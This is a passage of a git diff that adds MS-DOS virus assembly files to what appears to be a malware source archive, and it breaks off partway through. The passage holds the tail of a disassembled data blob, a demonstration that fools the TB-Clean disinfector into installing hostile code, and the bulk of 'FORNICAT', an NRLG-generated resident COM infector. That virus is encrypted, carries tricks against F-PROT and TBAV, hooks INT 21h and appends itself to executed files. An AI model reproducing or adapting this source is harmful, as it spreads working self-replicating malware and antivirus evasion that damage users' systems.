'a WAREZ' + db 01h, 00h, 1Ah, 03h, 00h, 40h + db 02h, 01h, 01h, 04h, 7Ah, 10h + db 00h, 01h,0B8h, 00h, 05h,0CDh + db 10h,0B4h, 0Fh, 01h, 80h, 04h + db 0BFh, 2Ch, 01h, 8Ah, 25h, 3Ah + db 0C4h, 74h, 06h, 8Ah,0C4h, 32h + db 0E4h, 02h + db 45h +loc_33: +;* pop cs ; Dangerous 8088 only + db 0Fh + mov bp,163h + mov di,data_29e + cmp ax,1B9h + or ah,[bp+di] + xor dx,dx ; Zero register + xor bl,bl ; Zero register + mov ax,1110h + adc al,0C3h + nop + sbb ax,50h + pop es + add [bp-7Fh],di + movsw ; Mov [si] to es:[di] + add word ptr ds:data_51e[bx+di],284Eh + add al,7Eh ; '~' + adc [si-2],bh + db 0FEh,0D6h, 03h,0B8h,0A9h,0BAh + db 0C6h,0FEh, 7Ch, 21h, 6Ch,0EEh + db 0Fh,0C2h, 8Dh, 01h, 7Ch, 38h + db 10h, 10h, 10h, 38h, 7Ch, 3Eh + db 0ABh, 01h, 0Eh, 10h, 0Dh,0D4h + db 9Fh, 24h, 6Ch, 07h, 1Fh,0FEh + db 0A4h, 43h,0FEh, 10h, 01h, 18h + db 3Ch, 9Ch, 26h, 01h, 18h, 0Bh + db 0FFh, 01h,0E7h, 65h, 3Bh,0C3h + db 01h,0E7h, 0Ah,0FFh,0D5h, 7Dh + db 1Fh, 66h, 01h, 21h,0AAh,0BBh + db 1Fh, 99h, 01h, 21h, 80h, 74h + db 12h, 1Eh + db 0Eh, 1Eh, 36h, 78h,0CCh, 01h + db 78h, 9Eh,0B8h + db 42h, 2Dh, 7Eh + db 18h, 18h, 91h, 70h +loc_36: + push dx + push ds + sbb bl,ds:data_30e + js loc_36 ; Jump if sign=1 + jo loc_41 ; Jump if overflow=1 + push ax + adc byte ptr ds:[236h],bh + db 36h, 76h,0F6h, 66h, 4Eh, 12h + db 37h, 0Ch, 7Dh,0DBh, 7Eh, 33h + db 3Ch, 7Eh, 37h, 00h,0DBh, 30h + db 00h, 80h,0E0h,0F0h,0FCh,0FEh + db 0FCh,0F0h,0E0h + db 37h +data_22 db 80h + db 80h, 10h, 02h, 0Eh, 3Eh, 7Eh + db 0FEh, 7Eh, 3Eh, 0Eh, 02h, 77h + db 0D6h,0ADh, 5Ch, 61h,0EBh,0CCh + db 0B2h, 66h, 01h, 08h, 93h, 24h + db 10h, 7Fh,0DBh, 01h, 7Bh, 1Bh + db 2Fh, 00h, 01h, 30h,0C6h,0C6h + db 60h, 7Ch,0F6h +loc_40: + xchg ax,sp + xchg bl,dh + jl $+0Eh ; Jump if < + or [si+0],bh + push si +loc_41: + sbb word ptr [bp+233h],0FA50h +;* jg loc_46 ;*Jump if > + db 7Fh, 4Fh + jle $+5 ; Jump if < or = + db 60h,0C0h,0FFh, 09h, 0Dh, 70h + db 01h, 0Ch, 0Eh,0FFh, 1Ah, 40h + db 0Eh, 0Ch, 01h,0A3h, 30h, 70h + db 0FEh, 70h, 30h, 83h,0D2h, 02h + db 0B4h,0C0h, 01h,0FEh, 41h,0C3h + db 01h, 0Fh, 24h, 66h,0FFh, 66h + db 24h, 02h, 90h + db 42h + db 2Fh, 83h, 00h, 8Bh, 0Eh, 1Ah + db 0FAh, 7Ch, 38h, 01h,0B1h, 04h + db 01h, 40h,0D5h, 9Dh, 7Ch, 7Dh + db 2Dh, 75h, 90h, 36h, 01h, 14h + db 02h + db 20h, 65h, 7Bh, 6Ch + db 01h,0FEh, 03h, 6Ch, 0Bh,0EAh + db 0B0h,0F2h +loc_46: + db 0C0h, 78h, 3Ch, 06h,0EEh, 05h + db 38h,0C2h, 00h, 62h, 66h, 0Ch + db 18h, 30h, 66h,0C6h, 81h, 80h + db 0Dh, 38h, 6Ch, 38h, 30h, 76h + db 7Eh,0B0h, 76h,0B3h + db 0F4h,0CCh, 01h, 18h, 03h, 70h + db 0DCh,0EEh, 2Bh, 01h, 18h,0E2h + db 0DCh, 7Ah, 09h, 01h, 18h + db 00h,0E2h,0A1h, 0Fh, 42h,0FEh + db 38h, 6Ch, 02h,0A3h + db 0F4h,0AEh,0EFh, 05h,0B7h, 04h + db 58h,0FEh,0BFh, 48h, 09h,0D8h + db 1Fh, 01h, 03h, 06h + db 5Dh, 2Eh + db 08h, 60h,0C0h,0F0h, 7Eh, 92h + db 0Fh, 7Dh,0DBh,0DBh, 05h, 3Ch + db 0F8h, 90h, 78h, 82h,0B0h,0DDh + db 0D0h, 30h,0C6h, 45h,0D5h, 54h + db 10h, 06h, 06h + db 0EEh, 01h, 03h, 28h,0DEh, 0Ch + db 1Ch, 3Ch, 6Ch,0DDh,0E5h, 86h + db 0FEh, 7Fh, 1Eh, 7Bh,0C2h,0C0h + db 0C0h,0FCh, 1Eh,0A8h, 01h, 20h + db 1Eh, 10h,0FAh, 68h, 44h, 0Eh + db 0FEh,0CFh, 9Fh, 4Fh, 01h, 60h + db 0C6h, 7Ch,0BEh,0F5h, 01h, 20h + db 0Ch, 7Eh, 00h + db 40h, 7Dh + db 0F6h,0DCh, 04h, 04h, 10h, 77h + db 0FBh,0F0h,0CDh, 60h, 70h, 36h + db 40h,0FFh, 01h,0CCh,0FDh, 01h + db 1Bh,0C2h,0D3h,0B0h, 60h, 0Ch + db 18h, 00h,0E0h, 15h +data_23 dw 705Eh ; Data table (indexed access) + db 0DEh, 01h,0DCh,0C0h, 7Eh, 31h + db 08h, 22h, 38h, 38h, 6Ch,0FFh + db 0E2h, 67h, 66h,0C0h, 01h, 8Ah + db 0Dh, 20h,0FCh,0B2h, 33h, 32h + db 3Ch, 32h, 33h, 05h,0FCh,0B0h + db 43h, 08h, 60h, 33h, 61h,0F2h + db 08h, 6Fh,0C4h, 6Ch,0DFh,0F8h + db 6Ch, 98h, 3Ch, 36h, 33h, 01h + db 0F3h, 76h, 3Ch, 20h, 29h, 9Dh + db 7Ch,0DAh, 7Eh, 04h, 33h, 40h + db 07h, 83h, 21h,0FFh,0B0h, 32h + db 7Eh, 70h, 00h,0EFh, 00h, 1Ch + db 36h, 63h, 70h, 09h,0C1h,0C0h + db 0CCh,0CCh,0DCh,0BFh, 00h, 50h + db 98h, 0Eh,0E6h, 66h, 6Fh,0FEh + db 04h, 66h, 6Eh,0E0h, 70h, 60h + db 0Eh, 1Bh, 1Fh,0FCh,0D8h, 7Fh + db 4Eh,0C1h, 0Ah,0BEh,0FFh, 1Bh + db 20h, 36h, 13h + db 0CCh, 4Ch, 7Ch, 72h, 03h, 00h + db 0CEh,0C3h,0C3h,0C6h,0CCh,0D8h + db 0F0h,0F8h,0CCh,0C6h,0C0h, 80h + db 83h,0C5h, 3Eh, 6Fh, 37h,0FCh + db 09h,0E0h, 62h,0C0h,0E3h, 63h + db 73h, 7Fh, 5Bh, 43h, 43h,0C3h + db 80h, 92h,0E0h, 07h, 30h, 63h + db 0B0h, 15h, 11h, 67h, 63h, 61h + db 0E0h, 31h, 1Eh, 0Ah,0E3h,0F3h + db 80h,0C3h, 44h, 5Fh, 20h, 02h + db 0C9h,0ACh,0F3h,0B3h, 33h, 3Bh + db 36h, 42h, 3Ch,0F0h, 0Dh,0C0h + db 21h,0E3h,0C1h,0C1h,0D1h,0DBh + db 0DFh,0CEh, 7Eh, 07h, 03h, 80h + db 02h, 1Fh,0E6h + db 'Pf|xnwIg@' + db 11h,0EEh, 3Eh + db 0B0h, 95h, 70h, 1Ch, 06h, 66h + db 3Eh, 6Eh,0FFh, 99h, 0Ch, 7Fh + db 51h, 01h, 5Eh, 03h, 25h, 17h + db 7Bh, 01h,0C7h,0EEh, 58h,0F0h + db 0C0h, 01h, 13h, 1Eh + db 36h, 08h + db 1Bh,0D0h + db 18h, 99h, 01h,0BDh,0E7h,0B3h + db 54h, 42h, 0Eh, 29h, 42h,0FBh + db 50h,0A9h,0CEh, 7Eh, 06h + db 42h, 0Ch, 29h + db 0F9h, 10h, 81h + dw 2412h ; Data table (indexed access) + db 3Ch, 14h, 02h + db 11h, 03h, 0Fh, 3Bh,0E3h,0CAh + db 0C9h,0BEh, 33h, 25h,0F8h,0D1h + db 7Ch, 60h,0FDh,0D0h, 01h, 20h + db 80h, 02h, 2Eh,0FDh, 06h, 03h + db 01h,0BCh, 27h,0D0h, 8Dh, 20h + db 10h,0E8h, 61h, 38h, 6Ch,0C6h + db 00h, 0Eh, 01h,0A9h,0C3h, 50h + db 67h, 0Ch, 08h, 19h, 78h,0D8h + db 0D8h,0DCh, 21h, 0Ch,0B0h, 00h + db 0E0h,0C0h,0C7h, 5Eh, 7Eh,0F3h + db 33h, 33h, 53h,0C1h, 8Fh, 02h + db 4Ch,0F0h, 00h, 00h, 07h, 6Ch + db 7Eh,0CFh,0CCh,0CCh, 7Fh, 03h + db 4Ch, 3Eh, 3Ch, 67h,0C3h,0F3h + db 0DEh,0C0h, 6Eh, 3Ch, 0Ch, 06h + db 0A0h, 08h, 1Ch, 5Ch, 30h, 34h + db 0FCh,0B0h, 09h, 78h, 00h,0D0h + db 7Bh,0CEh,0C6h,0CEh, 76h,0B8h + db 0B8h,0E2h, 1Ch, 3Dh, 72h, 61h + db 03h,0A8h,0F0h, 0Eh, 01h, 61h + db 36h, 82h, 39h, 04h, 02h, 00h + db 03h, 03h,0C6h,0CCh, 8Fh, 8Fh + db 00h, 69h, 0Ah, 30h, 18h, 01h + db 12h, 66h,0FFh,0EBh,0E9h, 84h + db 63h, 01h, 40h, 0Eh, 40h, 60h + db 7Ch,0E6h, 65h, 5Eh,0B3h, 60h + db 0C0h, 83h, 1Eh, 67h, 01h,0CEh + db 2Ch, 5Ah, 40h, 03h,0B3h, 5Ch + db 54h, 03h,0A5h, 04h,0E0h,0C1h + db 0CEh,0CDh,0CCh,0CDh,0CEh, 7Ch + db 0D2h, 86h, 9Fh, 41h, 62h, 60h + db 60h,0F8h,0DFh, 76h, 63h, 00h + db 2Fh, 71h, 6Ch, 3Ch, 3Fh, 3Eh + db 9Ah, 0Ch,0F0h,0B0h, 01h,0D0h +loc_63: + db 6Ah,0BCh, 03h, 43h, 01h, 00h + db 0A8h, 99h, 02h, 36h, 01h,0D0h + db 18h +loc_64: + db 0C6h, 2Dh, 00h, 00h, 01h,0C3h + db 1Ch, 3Fh,0C1h, 3Ch, 66h,0C3h + db 10h, 80h, 08h,0B9h,0C1h, 63h + db 36h, 1Ch,0B1h +loc_65: + add word ptr ds:[0C1h],bp + or [bx+si-28h],bh + xor [si],ah + jl loc_64 ; Jump if < + dec cx + push bx + xor dl,ch + jo loc_65 ; Jump if overflow=1 + push cs + add word ptr [bp+0],0 + nop ;*ASM fixup - displacement + nop ;*ASM fixup - sign extn byte + add [bx+si],ax + cmp [di+1Ch],bx + and al,18h + add word ptr [bp+7600h],7DCh + esc 6,al ; coprocessor escape + mov al,12h + retn 8857h + into ; Int 4 on overflow + db 66h,0CFh,0C6h, 64h, 81h, 82h + db 0Ch,0CCh, 5Fh,0C6h,0C6h, 4Ch + db 1Eh, 03h, 01h,0CEh, 76h, 1Dh + db 0CAh + db 5Eh, 23h + db 0FEh,0C0h,0A5h, 80h, 90h, 30h + db 78h,0CCh, 00h, 78h, 0Ch, 7Ch + db 90h, 8Bh,0C1h, 7Ah,0B0h, 20h + db 0CCh, 04h, 10h, 8Ch, 87h,0F5h + db 03h, 10h + db 0FFh, 04h, 30h,0C3h,0C2h, 12h + db 2Dh,0CEh, 2Eh, 0Ch, 43h, 50h + db 3Eh, 7Bh, 02h, 60h, 50h, 03h + db 70h,0B0h, 47h, 9Fh, 03h, 20h + db 0B0h, 5Dh, 78h, 38h,0EFh, 3Ch + db 0DEh, 67h,0AFh, 04h, 10h, 80h + db 0CFh, 90h, 02h, 10h,0CFh, 02h + db 0CAh,0B7h, 40h,0D2h, 8Fh, 4Fh + db 21h, 02h, 10h,0DFh,0FEh, 21h + db 1Fh, 4Ch, 50h, 01h,0B7h,0E0h + db 66h,0DBh, 1Bh, 7Fh,0D8h,0D8h + db 0DFh,0B0h, 7Eh, 2Ah,0E9h, 0Bh + db 01h,0FEh, 04h,0DEh,0C3h,0B2h + db 00h,0A3h, 37h,0FBh, 90h, 48h + db 02h, 10h,0DDh,0B3h,0B0h, 00h + db 10h, 30h, 61h,0F6h, 02h, 50h + db 0A0h, 02h, 10h, 0Bh, 9Fh, 6Fh + db 0FCh,0F7h, 10h, 4Fh, 40h, 83h + db 7Fh, 8Fh, 70h, 05h, 5Fh, 70h + db 0C0h,0A8h, 92h, 6Eh,0CDh,0BAh + db 0F0h,0F8h,0E2h,0BEh, 66h,0F6h + db 6Ch, 9Fh, 48h,0EEh, 0Fh, 3Ch + db 20h, 70h, 88h, 7Bh,0FCh,0C0h + db 0CCh,0DEh, 70h, 28h, 80h, 07h + db 0Eh, 56h, 48h, 1Bh, 18h, 3Fh + db 01h, 2Eh, 34h,0D8h, 70h, 01h + db 02h + db 0CCh, 86h,0A0h, 10h, 02h, 40h + db 8Bh,0FFh, 00h, 80h,0F0h, 91h + db 48h, 3Eh, 04h, 7Eh,0D0h, 2Dh + db 0F1h, 60h,0BCh, 5Fh,0E6h, 16h + db 1Ch, 0Fh, 2Bh,0E6h,0F6h,0DEh + db 0CEh, 00h, 34h, 60h, 00h, 3Ch + db 6Ch, 6Ch, 3Eh, 00h, 7Eh, 00h + db 06h,0D1h, 7Ch, 7Ah, 38h, 00h + db 7Ch,0E2h, 90h, 02h,0CDh,0E0h + db 08h, 2Dh, 5Fh, 02h, 55h,0B6h + db 2Eh, 31h,0D2h, 03h, 1Ch,0E1h + db 95h, 51h, 72h, 48h,0CEh, 60h + db 62h, 66h, 6Ch, 85h,0CAh, 0Fh + db 0DCh, 36h, 9Ah, 3Eh, 10h, 36h + db 6Eh,0DEh,0CEh, 25h, 36h, 7Eh + db 23h, 5Ah, 1Eh, 0Eh, 3Ch, 00h + db 62h, 11h, 7Ah,0C4h, 6Ch,0D8h + db 6Ch, 36h, 01h, 4Eh, 72h,0D2h + db 0Eh, 6Ch,0D8h, 0Bh, 11h, 44h + db 0E9h, 74h, 04h, 02h,0AAh, 55h + db 04h, 02h,0DDh, 77h, 04h, 02h + db 5Dh, 7Fh, 18h + db 0Dh, 01h,0F8h, 05h, 0Eh,0DDh + db 0EEh, 10h, 36h, 01h,0F6h, 08h + db 2Fh,0F4h,0A2h, 03h, 10h,0CEh + db 0DBh, 06h, 30h,0F6h, 06h, 30h + db 0EFh, 5Eh, 06h, 01h, 3Eh, 05h + db 20h, 0Fh,0DFh + db 30h + db 0BDh, 12h,0F7h, 6Fh, 10h, 90h + db 05h,0AAh,0EBh, 03h,0F8h, 05h + db 0C0h + db 1Fh, 03h,0A5h, 79h, 30h, 01h + db 0FFh, 06h, 2Ah, 6Fh,0A6h, 06h + db 30h, 05h + db 74h +loc_72: + push word ptr [bx+0Dh] + push es + inc ax + add ax,1F2Eh + add ax,3A3Ah + adc [bx],dh + add ax,ax + aaa ; Ascii adjust + xor [bx],bh + add bp,[bp+3Fh] + popf ; Pop flags + pop si + xor [si],al + and bh,dh + add [si],al + nop + mov dx,0E06h + test word ptr [di],3740h + add sp,[bx+si] + db 0FFh,0FBh,0FFh, 30h, 40h,0BEh + db 0BDh, 30h,0DEh, 04h, 20h,0BAh + db 0DEh, 01h, 06h, 60h,0FFh, 06h + db 0E0h,0A0h,0FBh, 05h, 88h, 3Fh + db 03h,0F0h, 1Fh, 70h, 6Ah, 40h + db 01h, 1Fh, 07h,0D0h, 75h, 20h + db 3Fh, 05h, 40h,0FFh, 04h, 90h + db 0Dh + db 0Dh, 18h, 06h, 60h, 06h,0AFh + db 0DEh,0B0h, 50h,0FFh, 05h, 01h + db 0C2h,0A9h, 00h,0CAh, 01h +loc_75: + lock jmp short loc_75 + add ax,0F01h + add ax,601h + cmp ds:data_56e[bx+si],dl + int 10h ; ??INT Non-standard interrupt + jcxz $+2 ; Jump if cx=0 + mov al,byte ptr ds:[0CC78h] + esc 0,[bp+si+3615h] ; coprocessor escape + out 0DCh,al ; port 0DCh, DMA-2 clr mask reg + db 0C0h, 70h,0C5h, 62h,0FEh, 66h + db 62h, 71h, 96h,0EDh, 00h, 5Fh + db 6Ch, 01h, 27h, 8Bh,0D0h, 62h + db 80h, 96h, 9Fh, 30h, 62h,0C6h + db 00h, 09h,0E5h, 73h, 7Eh,0D8h + db 20h,0D8h, 70h,0B3h,0E9h, 50h + db 01h, 7Ch, 2Bh,0B3h, 71h, 71h + db 81h, 61h, 01h, 1Ch,0FEh, 38h + db 0EAh,0BDh, 90h, 6Ch, 06h, 40h + db 0ECh, 89h, 9Fh, 33h,0CBh, 61h + db 0Fh, 0Eh, 01h,0EEh,0D5h, 8Ah + db 0D0h, 89h, 3Ch, 66h, 7Ch,0BAh + db 12h, 00h, 19h,0EDh, 70h, 82h + db 53h, 40h, 63h, 02h, 06h, 7Ch + db 0CEh,0DEh,0F6h,0F6h, 3Eh,0D9h + db 70h, 71h, 30h, 32h, 5Ah,0E0h + db 30h, 1Ch, 01h,0D9h,0ADh, 60h + db 01h, 01h, 6Ah,0F5h, 2Dh,0FEh + db 02h, 33h,0AAh,0BEh, 5Fh, 7Eh + db 6Ah, 55h, 90h, 06h, 8Dh,0ADh + db 0ACh, 7Eh, 00h, 6Fh,0F2h,0A3h + db 6Dh, 72h, 0Ch, 1Eh, 1Ah, 29h + db 5Ah, 09h, 12h, 58h, 78h, 30h + db 00h,0A5h,0D5h, 7Ah, 7Eh, 00h + db 03h,0B1h,0B0h, 2Fh, 25h,0D0h + db 5Bh, 97h, 78h,0CCh, 01h,0CAh + db 07h,0FDh, 1Bh,0ADh, 11h, 05h + db 0E1h,0D4h, 0Ah,0D8h,0D8h, 78h + db 38h, 14h,0D8h,0B0h,0A2h, 01h + db 8Ch, 00h,0D8h, 6Ch,0B4h,0A1h + db 04h, 3Fh, 7Eh,0F5h, 36h, 01h + db 00h, 1Ch, 01h,0FCh,0B4h,0A1h + db 00h,0FCh, 00h, 0Dh, 6Dh,0FCh + db 00h,0FCh, 68h, 43h, 00h,0FCh + db 00h, 1Bh,0DAh,0FCh, 00h,0FCh + db 0D0h, 86h, 00h,0FCh, 00h, 36h + db 0B4h,0FCh, 00h,0FCh,0A1h, 0Dh + db 00h,0FCh, 6Dh, 68h, 00h,0FCh + db 00h,0FCh, 43h, 1Bh, 00h,0FCh + db 0DAh,0D0h, 00h,0FCh, 00h, 86h + db 06h, 8Ah, 00h,0FFh, 00h + +seg_a ends + + + + end diff --git a/MSDOS/Virus.MSDOS.Unknown.fooltbc.asm b/MSDOS/Virus.MSDOS.Unknown.fooltbc.asm new file mode 100644 index 00000000..fbb388b8 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.fooltbc.asm @@ -0,0 +1,88 @@ +; +; How to fool TB-Clean using the prefetch queue. +; +; Conzouler / Immortal Riot 1995. +; +; (Ideas from 40Hex magazine issue 7) +; +; Debuggers like TB-Clean reads one instruction a time from +; memory while the processor will read 16 and put them in a +; prefetch queue. Therefore, if you change code that already +; is is in the prefetch the change won't affect the program +; when run normally, but if the program is run with TB-Clean +; it will run the changed code. +; Any branch (jumps, calls, ints and rets) will flush the +; prefetch and 16 bytes will be read from the new position. +; So, you can change the location of a jump to make some +; code run if a debugger is used but another when executed +; normally. Get it? +; The fun part with TB-Clean is that you can use this tech- +; nique to simulate a program restoration but instead you +; put some mean code instead of the original program. +; +; You can also just do an int20 when tbscan is executed and +; make TB-Clean say: "File might not be infected at all or +; is damaged by an overwriting virus". Which is exactly what +; TB-Clean would say if the file wasn't infected in the first +; place. +; +; Try to compile this code and run it, then use TB-Clean on it +; and rerun the "cleaned" file. +; + +.model tiny +.code + org 100h + +start: + jmp entry + +; Carrier file... +carrier db 1+offset nodebug-offset debug dup(90h) + +; Your code... +entry: + call delta ; Get delta offset. +delta: pop si ; TbScan will detect this + ; but this is about fooling + ; TbClean. + + mov byte ptr ds:[$+6], 0 ; This changes the jump. + jmp short nodebug ; If this is a near jump + ; you'll have to make above + ; a word ptr and add 7 instead. + +; Here is the code that simulates a restoration. + mov di, 100h ; Offset to entry point. + push di ; Save to perform a ret later + + add si, offset debug - offset delta + ; Relative offset to routine + ; to put at entry point. + + mov cx, offset nodebug - offset debug + ; Size of routine. + + rep movsb ; Move the code. + ret ; Jump to entry point. + +debug: +; Here is the routine TBClean will put in the restored program. + mov ah, 9 ; Display string. + mov dx, 100h + offset tbsux - offset debug + int 21h + ret ; Instead of int20 +tbsux db 'TB-Clean stinks!!!',7,'$' + + +nodebug: +; Here is your normal code. + mov ah, 9h ; Display string + add si, offset msg - offset delta + mov dx, si + int 21h + int 20h + +msg db 'Hi dudez.. tbclean cannot disinfect diz...$' + +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.fornicat.asm b/MSDOS/Virus.MSDOS.Unknown.fornicat.asm new file mode 100644 index 00000000..850016b7 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.fornicat.asm @@ -0,0 +1,490 @@ +;Ŀ +; THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. [NuKE] PoWeR +; CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN [NuKE] WaReZ +; auToR: aLL [NuKE] MeMeBeRS [NuKE] PoWeR +; [NuKE] THe ReaL PoWeR! [NuKE] WaReZ +; NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 [NuKE] PoWeR +; + +.286 +code segment +assume cs:code,ds:code +org 100h + +start: CALL NEXT + +NEXT: + mov di,sp ;take the stack pointer location + mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus + sub bp,offset next ;subtract the large code off this code + ; +;******************************************************************* +; #1 DECRYPT ROUTINE +;******************************************************************* + +cmp byte ptr cs:[crypt],0b9h ;is the first runnig? +je crypt2 ;yes! not decrypt +;---------------------------------------------------------- +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt]+ bp ;di = first byte to decrypt +mov dx,1 ;dx = value for decrypt +;---------------------------------------------------------- +deci: ;deci = fuck label! +;---------------------------------------------------------- + +xor word ptr [di],0fbfbh +add byte ptr [di],087h +add word ptr [di],0c574h +add byte ptr [di],0b8h +sub word ptr [di],04d33h +sub byte ptr [di],0b2h +sub word ptr [di],0279h +sub word ptr [di],01bc5h +sub word ptr [di],01a8ah +add word ptr [di],0d649h +add byte ptr [di],0b4h +xor byte ptr [di],0cch +sub byte ptr [di],089h +inc word ptr [di] +xor byte ptr [di],098h +not word ptr [di] +inc di +inc di +;---------------------------------------------------------- +jmp bye ;######## BYE BYE F-PROT ! ########## +mov ah,4ch +int 21h +bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!### +;----------------------------------------------------------- +mov ah,0bh ;######### BYE BYE TBAV ! ########## +int 21h ;### (CANGE INT AT YOU PLEASURE) ### +;---------------------------------------------------------- +loop deci ;repeat please! + ; +;***************************************************************** +; #2 DECRYPT ROUTINE +;***************************************************************** + ; +crypt: ;fuck label! + ; +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt2] + bp ;di = first byte to decrypt +;--------------------------------------------------------------- +deci2: ; +xor byte ptr cs:[di],1 ;decrytion rutine +inc di ;very simple... +loop deci2 ; +;--------------------------------------------------------------- +crypt2: ;fuck label! + ; +MOV AX,0CACAH ;call to my resident interrup mask +INT 21H ;for chek "I'm is residet?" +CMP Bh,0CAH ;is equal to CACA? +JE PUM2 ;yes! jump to runnig program +call action +;***************************************************************** +; NRLG FUNCTIONS (SELECTABLE) +;***************************************************************** + +call ANTI_V +;**************************************************************** +; PROCESS TO REMAIN RESIDENT +;**************************************************************** + +mov ax,3521h +int 21h ;store the int 21 vectors +mov word ptr [bp+int21],bx ;in cs:int21 +mov word ptr [bp+int21+2],es ; +;--------------------------------------------------------------- +push cs ; +pop ax ;ax = my actual segment +dec ax ;dec my segment for look my MCB +mov es,ax ; +mov bx,es:[3] ;read the #3 byte of my MCB =total used memory +;--------------------------------------------------------------- +push cs ; +pop es ; +sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus +sub bx,17 + offset fin ;and 100H for the PSP total +mov ah,4ah ;used memory +int 21h ;put the new value to MCB +;--------------------------------------------------------------- +mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin +mov ah,48h ; +int 21h ;request the memory to fuck DOS! +;--------------------------------------------------------------- +dec ax ;ax=new segment +mov es,ax ;ax-1= new segment MCB +mov byte ptr es:[1],8 ;put '8' in the segment +;-------------------------------------------------------------- +inc ax ; +mov es,ax ;es = new segment +lea si,[bp + offset start] ;si = start of virus +mov di,100h ;di = 100H (psp position) +mov cx,offset fin - start ;cx = lag of virus +push cs ; +pop ds ;ds = cs +cld ;mov the code +rep movsb ;ds:si >> es:di +;-------------------------------------------------------------- +mov dx,offset virus ;dx = new int21 handler +mov ax,2521h ; +push es ; +pop ds ; +int 21h ;set the vectors +;------------------------------------------------------------- +pum2: ; + ; +mov ah,byte ptr [cs:bp + real] ;restore the 3 +mov byte ptr cs:[100h],ah ;first bytes +mov ax,word ptr [cs:bp + real + 1] ; +mov word ptr cs:[101h],ax ; +;------------------------------------------------------------- +mov ax,100h ; +jmp ax ;jmp to execute + ; +;***************************************************************** +;* HANDLER FOR THE INT 21H +;***************************************************************** + ; +VIRUS: ; + ; +cmp ah,4bh ;is a 4b function? +je REPRODUCCION ;yes! jump to reproduce ! +cmp ah,11h +je dir +cmp ah,12h +je dir +dirsal: +cmp AX,0CACAH ;is ... a caca function? (resident chek) +jne a3 ;no! jump to a3 +mov bh,0cah ;yes! put ca in bh +a3: ; +JMP dword ptr CS:[INT21] ;jmp to original int 21h +ret ; +make db 'FORNICAT by [NRLG]' +dir: +jmp dir_s +;------------------------------------------------------------- +REPRODUCCION: ; + ; +pushf ;put the register +pusha ;in the stack +push si ; +push di ; +push bp ; +push es ; +push ds ; +;------------------------------------------------------------- +push cs ; +pop ds ; +mov ax,3524H ;get the dos error control +int 21h ;interupt +mov word ptr error,es ;and put in cs:error +mov word ptr error+2,bx ; +mov ax,2524H ;change the dos error control +mov dx,offset all ;for my "trap mask" +int 21h ; +;------------------------------------------------------------- +pop ds ; +pop es ;restore the registers +pop bp ; +pop di ; +pop si ; +popa ; +popf ; +;------------------------------------------------------------- +pushf ;put the registers +pusha ; +push si ;HEY! AZRAEL IS CRAZY? +push di ;PUSH, POP, PUSH, POP +push bp ;PLEEEEEAAAAAASEEEEEEEEE +push es ;PURIFY THIS SHIT! +push ds ; +;------------------------------------------------------------- +mov ax,4300h ; +int 21h ;get the file +mov word ptr cs:[attrib],cx ;atributes +;------------------------------------------------------------- +mov ax,4301h ;le saco los atributos al +xor cx,cx ;file +int 21h ; +;------------------------------------------------------------- +mov ax,3d02h ;open the file +int 21h ;for read/write +mov bx,ax ;bx=handle +;------------------------------------------------------------- +mov ax,5700h ; +int 21h ;get the file date +mov word ptr cs:[hora],cx ;put the hour +mov word ptr cs:[dia],dx ;put the day +and cx,word ptr cs:[fecha] ;calculate the seconds +cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX) +jne seguir ;yes! the file is infected! +jmp cerrar ; +;------------------------------------------------------------ +seguir: ; +mov ax,4202h ;move the pointer to end +call movedor ;of the file +;------------------------------------------------------------ +push cs ; +pop ds ; +sub ax,3 ;calculate the +mov word ptr [cs:largo],ax ;jmp long +;------------------------------------------------------------- +mov ax,04200h ;move the pointer to +call movedor ;start of file +;---------------------------------------------------------- +push cs ; +pop ds ;read the 3 first bytes +mov ah,3fh ; +mov cx,3 ; +lea dx,[cs:real] ;put the bytes in cs:[real] +int 21h ; +;---------------------------------------------------------- +cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ? +jne er1 ;yes! is a EXE... fuckkk! +;---------------------------------------------------------- +jmp cerrar +er1: +;---------------------------------------------------------- +mov ax,4200h ;move the pointer +call movedor ;to start fo file +;---------------------------------------------------------- +push cs ; +pop ds ; +mov ah,40h ; +mov cx,1 ;write the JMP +lea dx,[cs:jump] ;instruccion in the +int 21h ;fist byte of the file +;---------------------------------------------------------- +mov ah,40h ;write the value of jmp +mov cx,2 ;in the file +lea dx,[cs:largo] ; +int 21h ; +;---------------------------------------------------------- +mov ax,04202h ;move the pointer to +call movedor ;end of file +;---------------------------------------------------------- +push cs ; +pop ds ;move the code +push cs ;of my virus +pop es ;to cs:end+50 +cld ;for encrypt +mov si,100h ; +mov di,offset fin + 50 ; +mov cx,offset fin - 100h ; +rep movsb ; +;---------------------------------------------------------- +mov cx,offset fin +mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus +enc: ; +xor byte ptr cs:[di],1 ;encrypt the virus +inc di ;code +loop enc ; +;--------------------------------------------------------- +mov cx,offset fin +mov di,offset fin + 50 + (offset crypt - offset start) ;virus +mov dx,1 +enc2: ; + +not word ptr [di] +xor byte ptr [di],098h +dec word ptr [di] +add byte ptr [di],089h +xor byte ptr [di],0cch +sub byte ptr [di],0b4h +sub word ptr [di],0d649h +add word ptr [di],01a8ah +add word ptr [di],01bc5h +add word ptr [di],0279h +add byte ptr [di],0b2h +add word ptr [di],04d33h +sub byte ptr [di],0b8h +sub word ptr [di],0c574h +sub byte ptr [di],087h +xor word ptr [di],0fbfbh +inc di +inc di ;the virus code +loop enc2 ; +;-------------------------------------------- +mov ah,40h ; +mov cx,offset fin - offset start ;copy the virus +mov dx,offset fin + 50 ;to end of file +int 21h ; +;---------------------------------------------------------- +cerrar: ; + ;restore the +mov ax,5701h ;date and time +mov cx,word ptr cs:[hora] ;file +mov dx,word ptr cs:[dia] ; +or cx,word ptr cs:[fecha] ;and mark the seconds +int 21h ; +;---------------------------------------------------------- +mov ah,3eh ; +int 21h ;close the file +;---------------------------------------------------------- +pop ds ; +pop es 